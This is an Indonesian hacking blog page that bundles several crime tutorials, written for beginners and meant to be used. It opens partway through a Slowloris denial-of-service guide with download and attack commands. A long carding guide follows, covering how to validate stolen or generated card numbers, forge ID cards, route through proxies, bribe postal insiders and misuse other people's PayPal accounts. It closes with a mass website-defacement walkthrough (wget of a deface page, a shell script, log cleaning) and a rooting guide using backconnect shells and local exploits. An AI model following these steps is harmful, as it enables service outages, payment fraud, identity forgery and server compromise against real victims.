# perl slowloris.pl -dns  -port 80 -timeout 30 -num 5000 -cache
Jika menggunakan opsi DDoS attack IPv6
# perl -MCPAN -e 'install IO::Socket::INET6'
# perl -MCPAN -e 'install IO::Socket::SSL'
# wget http://ha.ckers.org/slowloris/slowloris6.pl
Contoh penerapan DDoS Attack Slowloris IPv6
# perl slowloris6.pl -dns  -port 80 -timeout 30 -num 5000 -cache
Namun ada beberapa service DDoS Attack yang tidak berpengaruh terhadap serangan slowloris atas webserver di bawah ini:
  • IIS6.0
  • IIS7.0
  • lighttpd
  • Squid
  • nginx
  • Cherokee
  • Netscaler
  • Cisco CSS
Untuk dapat me-minimalisir  serangan slowloris ini, jika anda menggunakan webserer apache, anda dapat menggunakan salah satu modul apache untuk pencegahan DDoS Attack, dimana dibahas pada tulisa berikut

Teknik Carding Polosan Buat Newbie!

Teknik Carding Polosan Buat Newbie!
Mungkin Bisa Bermanfaat Bagi Rekan2 Bajingan Aka Maling Gunakan Dengan Bijak Dan Tidak Di Wajibkan Bayar Pajak
Hanya Untuk #poolside dan temen2 lainnya
POCONG FEAT TUYUL NYAMAR
Tunggu Update Selanjutnya Cari CC Dari Dump Database !

http://cdn2.insidermonkey.com/blog/wp-content/uploads/2012/10/visa.png
....bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan yg ingin mencoba terjun dalam kegiatan carding....

...:::Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat e-mail bayar pada Network Solutions (www.networksolutions.com) dgn tdk menambah account (JANGAN klik menu pull down : add 1 account e-mail. Sebab kita memanfaatkan NetSol hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila ditolak, gunakan nomor lainnya. Jika anda merasa sulit untuk validasi di NetSol (saat ini semakin sulit), kami mencoba memberikan alternatif URL yang dapat anda jadikan referensi dalam hal daftar perusahaan-perusahaan register domain (hanya utk test nomor kartu kredit), yaitu pada www.internic.org/regist.html Atau dpt juga membeli software - software murah di situs - situs penjual software:::...

...:::Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut, kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi sebelum publikasi, hanya "bA" yg mengorder, dan barang yg diorder kuantitasnya minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, toko timeclub.com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini/th2008):::...

...:::Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick : *Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman lainnya (....dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda, alasannya : "....itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X" (pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa:::...

...:::Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga menggunakan trick diatas) *Bisa menggunakan nama dan alamat asli, karena order barang senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet) tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.):::...

...:::Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut bukan milik orang di Indonesia:::...

...:::Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org (..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita gunakan tsb sudah dicharge sebesar US$ 105:::...

...:::Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik kita (pembeli/shopper), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X" mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan Shipping Address (alamat tujuan pengiriman barang) HARUS SAMA. Jika dlm billing address yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama si "X" tadi:::...

...:::Jika anda tinggal di Propinsi Surabaya, sebaiknya alamat pengiriman barang jgn dikirim ke Kota BONEK tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan datang. Apa lagi untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya, kemungkinan besar masih bisa. Sebagai masukan, Surabaya menduduki peringkat ke-2 setelah Yogyakarta dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin bisa meraih peringkat I di dunia:::...

...:::Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari biaya penebusan:::...

...:::Dalam pengisian alamat e-mail (milik kita) utk jalur konfirmasi dari pihak online shop, sebaiknya gunakan alamat 'e-mail bayar'. Karena, selain tidak ada banner (menghemat waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya:::...

...:::Tidak semua online shop yg ada lambang VeriSign di websitenya aman dan ketat dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali, pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani sistem pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya account tsb:::...

...:::Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan metode pembayarannya/payment sistem/payment methode (kecuali anda menguasai bahasa di negara online shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran <cash on delivery (pembayaran dilakukan di alamat tujuan). Tapi, bila metode seperti itu yg anda pilih, maka biasanya pihak online shop akan menanyakan (mengirim e-mail konfirmasi) lagi, "....apakah barang tersebut benar - benar mau dikirim ?" Solusinya : anda reply e-mailnya, dan katakan anda tidak jadi memesan, karena besok anda harus berangkat ke Singapura atau Hongkong, etc. untuk urusan kantor:::...

...:::Bila anda mendapat e-mail konfirmasi dari pihak online shop berupa ancaman (..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu. Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar, pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh solusinya, masih bejibun online shop yang lain:::...

...:::Jika anda dikirimi email konfirmasi dari pihak online shop berupa e-mail kosong, namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah (bukan di tempat umum), karena kemungkinan besar file tersebut mengandung trojan. Bila yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya trojan, anda bisa menginstall ulang sistem operasi pd komputer anda (dgn asumsi, anda harus menghapus bersih folder sistem operasi anda tersebut sebelum reinstall), dengan sistem operasi yg masih fresh:::...

...:::Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan e-mail konfirmasi ketika barang akan dikirim. Atau bahkan tidak mengirimkan e-mail konfirmasi kepada kita, saat setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c (jadi ada nilai kemungkinannya):::...

...:::Jika anda disebut sebagai thief, frauder, etc., pada e-mail konfirmasi dari online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya:::...

...:::Setiap order yg berhasil (barangnya datang), biasanya anda mendapat surat panggilan dari Kantor Pos atau Jasa Pengiriman (<== via telepon) lainnya utk menebus barang tersebut (..utk barang yg kecil biasanya langsung dikirim ke alamat tujuan). Tebuslah barang tsb !! (Apalagi jika anda mengorder barang dalam jumlah besar), guna menjaga kemungkinan barang tsb dialihkan ke Kantor Polisi atau pihak berwenang lainnya:::...

...:::Hindari pemesanan/order yang besar - besar terutama untuk merk - merk terkenal dan mahal, serta perlu diperhatikan JUMLAH barang yg diorder dalam satu kali transaksi, karena jika terlalu banyak dapat menimbulkan kecurigaan pihak online shop/store:::...

...:::Jadilah orang yg sabar, hindari pemesanan yang menggunakan pengiriman express. Sebab, untuk menjaga kewajaran dalam pengeluaran dana dari nomor kartu kredit yg digunakan tersebut. Sehingga pihak online shop/store, berprasangka bahwa kita orang yg cukup memperhitungkan pengeluaran dana:::...

...:::Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki. Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik dalam pembentukan mental carder):::...

...:::Pelajari teknik hacking/cracking step by step:::...

...:::Jangan lupa berdoa kepada Tuhan YME, sesuai dgn agama dan kepercayaan anda. Semoga kita semua dalam lindungan-Nya. Amin:::...


Alternatif Lainnya :
- GANTI PROXY ANDA ( PROXY DIDAPAT DAN DI CHECK DI www.stayinvisible.com)
- GANTI PROXY SESUAI DENGAN NEGARA KARTU KREDIT ANDA
- KETIKA KARTU KREDIT SUDAH SIAP DAN PROXY SUDAH SIAP MAKA CHECK
KARTU KREDIT DI www.wallet.yahoo.com
YAHOO WALLET
- setelah dapat kartu kredit yang ok, beli email bayar di yahoomail plus
- dengan email bayar tersebut daftarkan di account www.ebay.com EBAY
- lalu mengecek keberadaan uangnya di www.ibs-authorization.com NGECEK ISI CC DAN
INFORMASI CC
- setelah ada uangnya. buatlah account www.paypal.com PAYPAL dengan cara subscription
- setelah urusan pembayaran telah siap, maka lakukan penawaran barang di www.ebay.com
- setelah ada barang yang dibayar, maka bayarlah dengan account di www.paypal.com PAYPAL
ACCOUNT

TIPS DAN TEKNIK :
- SITUS www.wallet.yahoo.com ( type security rendah = asal CCnya bukan USA )
- situs www.ebay.com ( type security rendah, lakukan transaksi yang bisa dikirim ketempat anda)
- www.ibs-authorization.com CHECK VALIDITAS DAN ISI CC (type security tinggi, harus ganti proxy dan sangat ketat )
- jika memakai kartu kredit generate kemungkinan nya isi kartu kreditnya bisa dilihat 60% saja.
- www.paypal.com (type security tinggi, jika memakai kartu kredit generate hanya 50% accountnya bisa dipakai)
- INGAT WALAUPUN SUDAH LOLOS YAHOO WALLET BELUM TENTU BERHASIL
- DIBELANJAKAN KARENA MUNGKIN SAJA UANGNYA SUDAH HABIS
- JADI ngecek di www.ibs-authorization.com sifatnya wajib dan bikin account dipaypal sifatnya tidak wajib karena ada metode lainnya yaitu account di bidpay Page 1 of TUTORIAL CARDING 2 http://users.cjb.net/teknik-carding/ 6/14/2005

tips selanjutnya :
- lebih baik memakai kartu kredit asli, atau jika memakai kartu kredit generate setelah lolos www.wallet.yahoo.com check apakah ada uangnya tidak di www.ibs-authorization.com jika sudah ada. maka pada penjual barang untuk dibayar lewat www.bidpay.com
- tingkat security www.bidpay.com lebih rendah dibandingkan www.paypal.com

tips selanjutnya :
- setelah barang selesai dibeli dan dibayar mintalah pada penjual untuk mengirimkan barangnya sebagai kado atau hadiah untuk saudara. maka buatlah ktp asli tapi palsu.dan mintalah pada penjual barangnya agar barang dikirim dengan settingan harga penjualan cuman dibawah 100$ (untuk menghindari pajak yang besar)
- gunakan kotak pos atau teromolpos (langganan sebaiknya )
- cari orang dalam untuk mengambil barang kita ( upah orang dalam Rp 200.000/paket = paket dibawah 5 juta =)

salam hangat buat seluruh RAJA CARDING di INDONESIA
SEMOGA CARDING TETAP JAYA
Dan buat para NEWBIE
SELAMAT MENJADI BAJINGAN


Iso Rumongso Ning Ojo Rumongso Iso

Kawruho sejatine wong urip
urip mono bebasan mung mampir ngombe
panjeriting wong urip sing ora nduwe
ngupaya bogo direwangi mbanting rogo
mung hasile ora misro, ora sepiro
rino wengi panas udan ora diroso
Sandang pangan kekurangan sarwo cecingkrangan
Mrono-mrene mung tandah dadi rasanan
nora kuwat, pengen sugih wedi yen kangelan
nuruti godhane setan, malah salah dalan
ngorbanake sedulur ugo katresnan
mburu bondo kadonyan nggolek pesugihan
Ngelingono neng ndonyo amung sedhelo
drajat pangkat bondo donyo bisa onyo
suk yen mati kabeh mau ora digowo

Paguyuban Penghayat Kapribaden

Saya adalah orang biasa-biasa
Dan bukan orang yang istimewa
Ataupun spesial,
Dan saya tidak ingin
Menjadi orang yang istimewa pula....
Anda pasti tidak ingin
Menjadi seperti saya
Dan saya pun tidak ingin seperti anda...
Inilah diri saya...
Tidak ada yang spesial dari saya.

SURABAYA HACKER LINK COMMUNITY
SEDHULURAN SAMPEK MATEK

sak nggathel-nggatheline raimu
sak kudu misuh-misuhine cangkemmu
koen tetep dulurku cok!!
Yang artinya:
Even if your face like vagina
Even if your mouth full of fucking shit
You're still my brother and sister, Horse Dick!!

Dibuat, di publikasi, cuma pengen di puji lalu menjadi sombong...payah.!
Di Depan Komputer Menemukan Sesuatu hal yang baru
Mencari Kelamahan suatu system Jauh Lebih Baik
Dari Pada Mencari/Mengejar Cinta Sejati

Manual Mass Deface By Gebie

Buat yang master, lewatin aja, nih tutorial buat yang baru belajar aja kayak saya...
langsung aja,.. dsini saya asumsikan kalian sudah punya root sendiri2,..
ok,. sekarang kita login di putty dan masukan ip server dan port yang mau kita mass deface,..


sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
PHP Code:
cd /etc/httpd/conf 

setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
comand'a :
PHP Code:
cat httpd.conf grep -i ServerName > /home/NamaUser/public_html/web.txt 
untuk NamaUser, klian bisa lihat di shell kalian masing2...



sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
comand'a :
PHP Code:
cat httpd.conf grep -i DocumentRoot > /home/NamaUser/public_html/user.txt 



setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
comand'a :
PHP Code:
cd /rootmkdir biecd bie
wget http
://blablabla.com/deface.html 



ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"


kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali


berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
PHP Code:
chmod 777 mass.sh; ./mass.sh 


yep,.. selese mass deface'a,..
sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
lalu jalankan log cleaner kalian, trus exit.. Smile


terkhir, kita ganti semua tulisan "SeverName" dengan "http://"


log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY

Simple Rooting By Meninbox SBH

langsung aja yah ga usah pake basa basi,.
pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
comand2'a, lihat aja di gambar,..


setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,


tggal jalanin deh local yg sdah kmu upload tadi,.

klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.

tahap akhir'a,. tggal add usermu aja distu,.


klo udah berhasil,. jadi'a kek gini


sekrang apa lagi,.??
ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
Diberdayakan oleh Blogger.

 

© 2013 I'Learning. All rights resevered. Designed by Templateism

Back To Top